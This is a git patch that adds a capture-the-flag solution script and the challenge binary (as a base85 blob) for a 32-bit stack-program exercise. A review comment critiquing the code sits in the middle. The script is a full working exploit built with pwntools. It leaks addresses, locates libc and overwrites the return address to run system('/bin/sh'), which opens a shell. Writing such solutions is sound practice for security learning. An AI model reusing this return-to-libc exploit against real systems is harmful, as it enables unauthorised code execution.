From 34783fa88d1a668bbd6415b704bb242ed5751a93 Mon Sep 17 00:00:00 2001
From: Jack Ren
Date: Fri, 17 Sep 2021 12:05:51 +0800
Subject: [PATCH] Finished full-protection/stack
---
 full-protection/stack/answer.py | 97 ++++++++++++++++++++++++++++++++
 full-protection/stack/stack | Bin 0 -> 7724 bytes
 2 files changed, 97 insertions(+)
 create mode 100755 full-protection/stack/answer.py
 create mode 100755 full-protection/stack/stack
diff --git a/full-protection/stack/answer.py b/full-protection/stack/answer.py
new file mode 100755
index 0000000..565193a
--- /dev/null
+++ b/full-protection/stack/answer.py
@@ -0,0 +1,97 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack, unpack
+import os, base64, math, time
+context(arch = "i386",os = "linux", log_level = "debug")
+
+# Python's int is variable-length, so we must transfer them to C-format
+def parseInt2Addr(num):
+ return u32(struct.pack("i", num))
+
+def parseAddr2Int(num):
+ return unpack("i", p32(num))[0]
+
+def chgtop_stack(p, top):
+ p.recvuntil("Cmd >>\n")
+ p.sendline("c")
+ p.recvuntil("Cmd >>\n")
+ p.sendline("p")
+ p.recvuntil("Cmd >>\n")
+ p.sendline("i %d" % top)
+
+def write_stack(p, shift, value):
+ chgtop_stack(p, shift - 1)
+ p.recvuntil("Cmd >>\n")
+ p.sendline("i %d" % parseAddr2Int(value))
+
+def read_stack(p, shift):
+ chgtop_stack(p, shift)
+ p.recvuntil("Cmd >>\n")
+ p.sendline("p")
+ p.recvuntil("Pop -> ")
+ s = p.recvuntil("\n")
+ return parseInt2Addr(int(s))
+
+def execute(p):
+ p.recvuntil("Cmd >>\n")
+ p.sendline("x")
+ p.recvuntil("Bye\n")
+
+p = process('./stack')
+elf = ELF('./stack')
+#gdb.attach(p, "b *(&main+471)") # retn of main
+
+#time.sleep(5)
+
+# Read program base shift from stack retaddr pushed by _start at 0x5ac
+program_base = read_stack(p, 121) - 0x5b1
+print("Program Base: %s" % hex(program_base))
+# Read user stack base by reading ECX pushed to stack at 0x74e
+user_stack_base = read_stack(p, 85) - 0x178
+print("User Stack Base: %s" % hex(user_stack_base))
+main_sym = elf.sym['main'] + program_base
+print("Main Symbol: %s" % hex(main_sym))
+# In fact, puts_plt is no usage here
+puts_plt = elf.plt['puts'] + program_base
+print("puts PLT: %s" % hex(puts_plt))
+puts_got = elf.got['puts'] + program_base
+print("puts GOT: %s" % hex(puts_got))
+"""
+# Cannot use puts PLT to leak puts GOT there at return of main
+# because PIE mode PLT use EBX to store offset but when returning EBX is null
+
+# Write main retaddr at shift 89 to call puts
+write_stack(p, 89 + unified_shift, puts_got)
+# Write retaddr of puts at shift 90 back to main
+write_stack(p, 90 + unified_shift, main_sym)
+# Write arg1 at shift 91 to pass GOT of puts
+write_stack(p, 91 + unified_shift, puts_got)
+execute(p)
+puts_libc = u32(p.recv(4))
+"""
+
+# Leask puts_got by using a
+puts_libc = read_stack(p, (puts_got - user_stack_base) / 4)
+print("puts libc: %s" % hex(puts_libc))
+
+libc = LibcSearcher('puts', puts_libc)
+libc_base = puts_libc - libc.dump('puts')
+print("base libc: %s" % hex(libc_base))
+system_libc = libc_base + libc.dump('system')
+print("system libc: %s" % hex(system_libc))
+binsh_libc = libc_base + libc.dump('str_bin_sh')
+print("/bin/sh libc: %s" % hex(binsh_libc))
+
+# A unified shift was applied to original shift to use in main's stack frame
+# Because of the compiler's alignment
+unified_shift = 4
+
+# Write main retaddr at shift 89 to call system
+write_stack(p, 89 + unified_shift, system_libc)
+# Write retaddr of puts at shift 90 back to main
+write_stack(p, 90 + unified_shift, main_sym)
+# Write arg1 at shift 91 to pass "/bin/sh"
+write_stack(p, 91 + unified_shift, binsh_libc)
+execute(p)
+p.interactive()
\ No newline at end of file
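Review bot: `parseInt2Addr` calls `struct.pack` although the file only does `from struct import pack, unpack`, so the name resolves only if `from pwn import *` happens to re-export the `struct` module; use the function already imported, `return u32(pack("i", num))`, which also matches how `parseAddr2Int` calls `unpack`. The slot index `(puts_got - user_stack_base) / 4` relies on Python 2 integer division (the shebang pins `python2`); writing it as `(puts_got - user_stack_base) // 4` states the intent and keeps the `"i %d"` format from silently truncating a float should the script ever run under Python 3. The comment `# Leask puts_got by using a` is truncated and misspelled, and the later `# Write retaddr of puts at shift 90 back to main` is carried over from the disabled puts chain inside the triple-quoted string even though the live call on the line above it targets `system`; reword both to describe what the live code does. None of `chgtop_stack`, `write_stack`, `read_stack` or `execute` documents the `Cmd >>` command protocol it drives or the unit of `shift` (4-byte slots, judging by the `/ 4`), so a one-line docstring per helper would help a reader who has not run the binary.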
diff --git a/full-protection/stack/stack b/full-protection/stack/stack new file mode 100755 index 0000000000000000000000000000000000000000..b2ca7d443e11c25b0df88682641a79e5c7f0befa GIT binary patch literal 7724 zcmeHMeQ;FO6~CKZaD}i57)w-I-q4_6$(le6ppLR6;X?z4B#27!x!I3oWwRT0-(p}G zC9F}?bsdIj$Btv2I^fh++Od<->d07dib&$I*vn+K&6BmnF;@jeKF&-+~ z6l=&pMi$`#yTR?iiZ1~s(+0Io*5wk(nPtToaFV zToVsh$76|1uRopi&$VpKOZ(E5tMRqk!I&DDc`Lx|JK7U#H?+Kc@csKLKfChv`ihg! z-}&LWO4=rY8H0W04U5^tWnj|crazv3`GXx>cHi>B-lH3CpSJ$~$G2FP(eEvzNihZK zyaQ`U`yH5eXGaj<;IPj?dbR`8{&NS`kZyHg+OKus$w!z%V%Z1v}4^b9*-)W1^bz&Bka#8GtO6!s>@D#S6W7y9yB^|TR= zCG<=>5*E51OD97M7wYLyFcB3!86z!vQn7>)74S-C40wckgL*WU2*zWZBO)C!Ixf%%5)K+c=sVJB%Mq#sid^2lLJvn$k!aMakYQkfts@JtjxsjEyU#-7SV~TrP2m z7|)3e;yU+29<}9}=@#~AmV5)4zDFogowq2l7>-h6;k-|YDjuW6f;vu#F)mUf@M%ia z=p5w)A%-Y1QHCk8@3du4dy9jpKwn`H^DmdJLb`viF|N1-iR^3MwFO9v%t5YHb0_Od zGIt_?h;BD`a`jSH+H#sLHCr+$?XzsTK+4(=?;7|^_V}5W_SPcTQ(vJ5Rmf-eo;1yt zeD-dNRkxXg9GT*8P18J=n^skbZdZR}QFME8Dmtp~)l=BE^FLUIO!;kG^0N%PR9tM9ZxkK0F!^<+K&opx%9jHHeAqTVG~8 zk+~|DWf!3`le4Ew&A~>1;{Gp86ETX{BFBL&9bIGN73V|O_v%EpZ`(9@<-GleGZ&w1 zL^5w&DRMjbtArYTXtl6K*6HxcD!Nuw6`(Cn#~d1W2;-D%^5#T-nJc&2J1_yC+=|kH z=53zs>!jNddUD)TBW^7w+y}~;M}8W&d)5{5%~c+Zp1ENdf!DOH>O1{?9>JFbI%>$8GDn$R-~))xy4wB+Eq@szI~nD*6i*Dx z5U181ls@p68M4!)_0P8TCfVR>se9eleNXDS zF=X#6JoYVF`CPn8%MVs!J{1f9#-z(uAUXTMzAsApKQU(3n)w&3R(edMY7Tj|`NNm# zlRfA{Z!Y{-=7a2OrEBlfF?%+OvyQdQHQiRcS{8P-EX-TnjUwd!bcs}7LNzxeo&{Xk zq1(G+X{{%f>`Vo_wNSFVCl-%{wR>Ym*L7NFD5O<)&zq}NuZhp8-aIE2iKmiGB$D@P z)zO|9%ssIPlJfVd8exn`$VjF%iTyAqt)vhQ$?oo8B7EHh4HVO=HU{HN^<>gr7BFmA z>Ci(Ps3+N@MN`RcD~dFQEQ=P3M}l@iQr~OqBfT+0HAotwwn6^(YSDPGQ#5pkwHt2~ zGsB{V<|xmCEfcwJYNdOQz9uR+J{^lrrG9xr^}CBD*|%O)D0 zUUAdq*IzxiY6k6#z{8)JrrhiUK5u`?;z{E|`w_*?54#(6nFT47J#5(*K(!S-5q6%R zL}RH-EG-{bk`Ya1?u;?M{GyV~mU4GVrq{jCwGYNXA#gCTzX8!%r#;}GVH%?-Nz3r% z2K5AV>!^|C1$?CsxdXoP2R#8_MRwdupBD2~HTq^X`sM_DH7k7DQeQ=&;42Rt@RbG* z`n-YtJ_Ka^X{gh4h=uK4QYF4M(Cvm!_8a17OIG@1|JXkN7yo-b@Ep#7cY{fsrevPd 
zJUAobpelCZEQs@iJa=9}J(%|noeYN%enmT{oY)h}rt*NcAsjpdhei(^) z=Onm0Ye3mYB)6~{!alSxd)exH3uBN$ z9CMOejvV%b5zG<9emH_TLoj9|m@~ziE0k`52M5rLR#;%`*3CBrl3UIO>^~!zGr^i; zlx{gAtT|?3&J5gL?D2EkJG&ZBw>`5sr$}yrUw)D%zra&v!aIW13{&>Y&ifma=*CKfi>Wb%#ZQm6rWNuNqkH@4ImBU{|K>7%>N{?nh$&%Sq#j* zjx+`H_v!Qe_W_@_$BXgbaoA@d&sky(3}QT4aSI|Ibk>rV8Vz6Gt2|7ACYMYVbAX+1 zG1oi%ng4cR4fW%1Kl|e!kfjbCCy zPsMzl1%@K^iM6z)f%l#w3s>VED+4Q* zH^9qbK^ZANr{UpKZ(3$YTh`br^rg+WE)F#7w=P-I*3_=I2NpLsu>|?T7D{Ji%j}1@ zMT^wi7P{eUAJTdk)cZRlhTap>jjl{$y}zT^e%TunLp{>T9vFGN8+EBeMZOd&+zYMq zS#Z>!Pi`1Qy!_d3etc3KHFNOBKJn?{bW-oat&7ip=RZ!K_sBRl&Pe~TlZ77b(Yx-o zUoFQvjy^!zFO^?vP!J8e&|BkqZ<=~M84AWx1|K?kD@1FY@28{1&W8mrn`*Xjq%Qbo zX@^So;88lgsoMy4KpH7acBvHJVJKblUTxrhXrazT#@~^N;UPX27Jj0x zAnN50Z%QDZC5@D2*%(Qsc@30qHqc?im6`s+FFVrT6E_4u{>~&4Mx+;CE-pAG<&&;I z(q%8Ft}wDIWaYQkm6b!K?+L*TB?P-;Atd-L?8l%8KNfa37OUJ$zTt)Xn-&XjMt5jjIsn|bp`0@9jEbqV2lT?wj7yva^KqKw= zC(_ijT(1U(pK2piG6v;2J6%Hnq950hB9=wwS%